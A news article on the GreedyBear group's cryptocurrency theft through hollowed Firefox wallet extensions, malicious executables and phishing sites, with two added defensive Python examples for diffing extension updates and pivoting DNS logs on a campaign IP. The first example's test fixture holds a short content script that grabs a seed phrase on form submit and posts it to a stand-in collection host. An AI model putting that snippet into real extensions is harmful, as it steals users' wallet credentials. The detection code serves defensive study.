A sophisticated Russian cybercrime group known as GreedyBear has intensified its attacks on the cryptocurrency community, leveraging a multi-pronged strategy of malicious browser extensions, fake wallet software, and phishing websites to execute theft on an industrial scale.
According to a recent report from cybersecurity firm Koi Security, the group has stolen over $1 million worth of cryptocurrency in just over five weeks. This latest wave of attacks reflects both the growing professionalization of cybercriminal networks and the vulnerabilities that remain in the crypto ecosystem.
Weaponizing the Browser: Malicious Firefox Extensions
At the center of GreedyBear’s latest operation is a highly effective scheme involving 150 weaponized Firefox extensions. These malicious add-ons are disguised as legitimate versions of popular crypto wallets, including MetaMask, Exodus, Rabby Wallet, and TronLink.
The technique, which Koi Security calls Extension Hollowing, defeats marketplace review at submission time rather than evading it outright. The group first publishes a clean, functional extension under a wallet's name and lets it accumulate installs and reviews. Only later does it push an update that adds code to capture wallet credentials (seed phrases and passwords entered into the extension) and send them to attacker-controlled infrastructure. Because the malicious version arrives as an update to an already-trusted listing, neither the initial review nor the user's original install decision catches it.
The stolen credentials are then used to drain victims' wallets, often within minutes of capture. Koi Security notes that this method alone accounted for the majority of the $1 million stolen in the recent campaign.
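The defensive counterpart to Extension Hollowing is to treat every extension update as a new artifact and diff it against the version you vetted. The following is an added example (not code from the Koi report or the article): it compares two versions of an extension package and flags the changes a hollowing update typically introduces, namely new permissions, new content scripts, new or modified script files, and newly hard-coded network endpoints. The two package versions, the "Example Wallet" name, the file names and the 198.51.100.7 collection host are all constructed for illustration; in practice the file dictionaries would be read out of the two .xpi archives with `zipfile`.

```python
"""
Added example: diff two versions of a browser extension package and flag
the changes an "extension hollowing" update typically introduces.
The versions below are hypothetical; the file names, the wallet name and
the exfiltration host are constructed for illustration.
"""
import json
import re

# Hypothetical v1: a clean, functional wallet-lookalike extension.
CLEAN_V1 = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "Example Wallet",
        "version": "1.0.0",
        "permissions": ["storage"],
        "background": {"scripts": ["background.js"]},
    }),
    "background.js": "browser.storage.local.set({installed: Date.now()});\n",
}

# Hypothetical v2: same listing, but the update adds a broad host permission
# and a content script that posts the submitted unlock form to an external host.
HOLLOWED_V2 = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "Example Wallet",
        "version": "1.0.1",
        "permissions": ["storage", "<all_urls>"],
        "background": {"scripts": ["background.js"]},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    }),
    "background.js": "browser.storage.local.set({installed: Date.now()});\n",
    "inject.js": (
        "document.addEventListener('submit', e => {\n"
        "  const seed = document.querySelector('textarea').value;\n"
        "  fetch('http://198.51.100.7/collect', {method: 'POST', body: seed});\n"
        "});\n"
    ),
}

# Permissions that let an extension read or relay data from arbitrary pages.
HIGH_RISK_PERMS = {"<all_urls>", "webRequest", "webRequestBlocking",
                   "tabs", "clipboardRead"}
# Hard-coded http(s) endpoints in script source.
ENDPOINT_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?")


def extract_endpoints(files):
    """Return the set of hard-coded http(s) endpoints found in .js files."""
    found = set()
    for name, body in files.items():
        if name.endswith(".js"):
            found.update(ENDPOINT_RE.findall(body))
    return found


def diff_extension(old, new):
    """Compare two extension versions; return a list of finding strings."""
    old_m = json.loads(old["manifest.json"])
    new_m = json.loads(new["manifest.json"])
    findings = []

    # 1. Permissions added by the update.
    old_perms = set(old_m.get("permissions", []))
    new_perms = set(new_m.get("permissions", []))
    for p in sorted(new_perms - old_perms):
        tag = "HIGH" if p in HIGH_RISK_PERMS or p.startswith("*://") else "low"
        findings.append(f"{tag}: new permission {p!r}")

    # 2. Content scripts added by the update (code injected into web pages).
    added_cs = len(new_m.get("content_scripts", [])) - len(old_m.get("content_scripts", []))
    if added_cs > 0:
        findings.append(f"HIGH: {added_cs} new content_scripts entry(ies)")

    # 3. Script files that are new, or whose contents changed.
    for name in sorted(set(new) - set(old)):
        if name.endswith(".js"):
            findings.append(f"HIGH: new script file {name}")
    for name in sorted(set(old) & set(new)):
        if name.endswith(".js") and old[name] != new[name]:
            findings.append(f"medium: modified script {name}")

    # 4. Network endpoints that did not exist in the vetted version.
    for ep in sorted(extract_endpoints(new) - extract_endpoints(old)):
        findings.append(f"HIGH: new hard-coded network endpoint {ep}")

    return findings


if __name__ == "__main__":
    for line in diff_extension(CLEAN_V1, HOLLOWED_V2):
        print(line)
```

One caveat on the permission check: Firefox prompts the user when an update requests permissions the installed version did not have, so a hollowing operator may request broad permissions from the very first clean release. In that case the manifest diff is empty and only the script-content and endpoint checks fire, which is why the example does not rely on permissions alone.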
Scaling Up the Operation
The scale of this campaign marks a dramatic expansion from earlier efforts. Between April and July 2025, GreedyBear had deployed 40 malicious extensions. The latest offensive brings the count to 150, more than triple that number, reflecting a rapid scaling of resources and operational capability.
The increased success rate appears to have emboldened the group: the Firefox extensions are aimed at global, largely English-speaking audiences, while other delivery methods are reserved for Russian-speaking users.
Beyond the Browser: Malicious Executables and Phishing
While the fake wallet extensions are the most lucrative tactic, they are not the only weapon in GreedyBear’s arsenal. The group has also deployed nearly 500 malicious Windows executables, strategically placed on Russian websites offering pirated or repacked software.
These executables include credential stealers, ransomware payloads, and trojan malware, forming part of a broader distribution network capable of shifting tactics depending on the target. Once installed, these programs can capture everything from email passwords to private crypto wallet keys.
The phishing component of the campaign is equally sophisticated. GreedyBear operates dozens of convincing fake websites that impersonate legitimate crypto services — from hardware wallet manufacturers to wallet recovery tools. Victims are lured into entering sensitive information, believing they are dealing with a trusted provider, only to have their data siphoned off for theft.
Centralized Coordination Behind the Scenes
Perhaps the most striking detail uncovered by Koi Security is that nearly all domains and attack vectors trace back to a single IP address: 185.208.156.66. This centralized infrastructure suggests tight operational control rather than a loosely connected network of actors. For defenders it is also a cheap, high-value pivot: any DNS resolution or outbound connection to that address is worth an alert, with the caveat that a single IP is trivial for the operator to change, so the block is a short-term control rather than a lasting one.
According to Koi CTO Idan Dardikman, this level of centralization is atypical for state-sponsored campaigns, which often use distributed networks to avoid detection. The evidence points toward an organized cybercrime group operating purely for profit.
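Because the campaign's domains collapse onto one IP, the same observation that let Koi attribute the infrastructure also gives a network defender a simple detection: group resolver logs by answer IP, alert on the published indicator, and surface any other IP hosting a cluster of wallet-themed lookalike names. The code below is an added example, not from the report or the article. The log format, the client addresses and every domain (all under the reserved .invalid TLD) are constructed for the example; only the 185.208.156.66 indicator comes from the report.

```python
"""
Added example: pivot on shared hosting infrastructure by grouping DNS
resolver log lines by resolved IP, flagging hits on a known campaign IOC,
and surfacing other IPs that host several lookalike domains.
All domains and the log format below are constructed; only the IOC is real.
"""
from collections import defaultdict
import ipaddress

# Indicator published in the Koi Security report.
CAMPAIGN_IOCS = {"185.208.156.66"}

# Constructed resolver log: timestamp, client, queried name, A-record answer.
SAMPLE_LOG = """\
2025-08-07T10:01:12Z 10.0.0.21 qname=hardware-wallet-recovery.invalid A=185.208.156.66
2025-08-07T10:01:40Z 10.0.0.21 qname=updates.example.invalid A=203.0.113.9
2025-08-07T10:02:03Z 10.0.0.34 qname=wallet-restore-service.invalid A=185.208.156.66
2025-08-07T10:02:11Z 10.0.0.34 qname=cdn.example.invalid A=203.0.113.9
2025-08-07T10:03:55Z 10.0.0.50 qname=metamask-support-portal.invalid A=185.208.156.66
2025-08-07T10:04:10Z 10.0.0.50 qname=mail.example.invalid A=198.51.100.3
this line is malformed and must be skipped
"""


def parse_line(line):
    """Parse one log line into (timestamp, client, qname, answer_ip), or None."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qname, answer = parts
    if not qname.startswith("qname=") or not answer.startswith("A="):
        return None
    try:
        # Normalises the address and rejects garbage such as "A=notanip".
        ip = str(ipaddress.ip_address(answer[2:]))
    except ValueError:
        return None
    return ts, client, qname[len("qname="):], ip


def group_by_ip(log_text):
    """Map each resolved IP to the set of domains that resolved to it."""
    groups = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            groups[rec[3]].add(rec[2])
    return groups


def find_ioc_hits(log_text, iocs=CAMPAIGN_IOCS):
    """Return (client, qname, ip) triples whose answer matches a known IOC."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] in iocs:
            hits.append((rec[1], rec[2], rec[3]))
    return hits


def infrastructure_clusters(log_text, min_domains=2):
    """Return {ip: sorted domains} for IPs hosting at least min_domains names.
    Shared hosting is the pivot that finds an operator's other domains even
    before the IP appears on a published indicator list."""
    return {ip: sorted(domains)
            for ip, domains in group_by_ip(log_text).items()
            if len(domains) >= min_domains}


if __name__ == "__main__":
    for client, qname, ip in find_ioc_hits(SAMPLE_LOG):
        print(f"IOC hit: {client} resolved {qname} -> {ip}")
    for ip, domains in infrastructure_clusters(SAMPLE_LOG).items():
        print(f"{ip} hosts {len(domains)} domains: {', '.join(domains)}")
```

The cluster view deliberately does not depend on the IOC list: a benign CDN will also show up with many names on one IP, so the output is a triage queue for an analyst, not an alert on its own. Combining the cluster with a wallet-brand keyword match on the domain names is the obvious next filter.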
Global vs. Local Targeting Strategy
Interestingly, Koi Security’s analysis reveals that GreedyBear adapts its tools based on the target demographic. The Firefox-based fake wallet attacks are aimed at a broader international audience, particularly English-speaking users, while the malicious executable files are primarily pushed toward Russian-speaking victims through regional piracy sites.
This segmentation increases their effectiveness by tailoring the delivery method and language to the intended target, making the attacks harder to spot.
Security Recommendations for Crypto Holders
In response to the growing threat, cybersecurity experts and Koi Security have issued practical recommendations for crypto users:
Only install browser extensions from verified developers with a long history of updates and positive feedback.
Avoid pirated software websites, as these are often seeded with malware.
Prefer official wallet software from trusted sources rather than browser extensions.
Use hardware wallets for storing large amounts of cryptocurrency, purchased directly from the manufacturer's website.
Be skeptical of unsolicited wallet repair or recovery services, as many are elaborate phishing schemes.
Dardikman further emphasized that serious long-term investors should move away from software wallets entirely, citing the relative security of hardware devices when acquired from legitimate vendors.
Why GreedyBear’s Attacks Are So Effective
The success of GreedyBear’s campaign highlights key weaknesses in the cryptocurrency ecosystem:
Trust in Brand Recognition: users often assume that if a wallet's name appears on a marketplace, it is legitimate.
Overreliance on Browser Extensions: extensions provide convenience but are more vulnerable to malicious updates.
Low User Awareness: many crypto holders underestimate the sophistication of phishing and malware campaigns.
The combination of these factors allows criminal groups to steal significant amounts with relatively low operational costs.
Looking Ahead: A Persistent Threat
GreedyBear’s rapid scaling over the past few months suggests that the group has both the resources and the motivation to continue refining its tactics. Unless platform security measures and user awareness improve, similar campaigns are likely to target crypto investors worldwide.
With over a million dollars in crypto stolen in a matter of weeks and a clear blueprint for expansion, GreedyBear exemplifies the evolving nature of cybercrime in the blockchain era: efficient, adaptive, and ruthlessly profit-driven.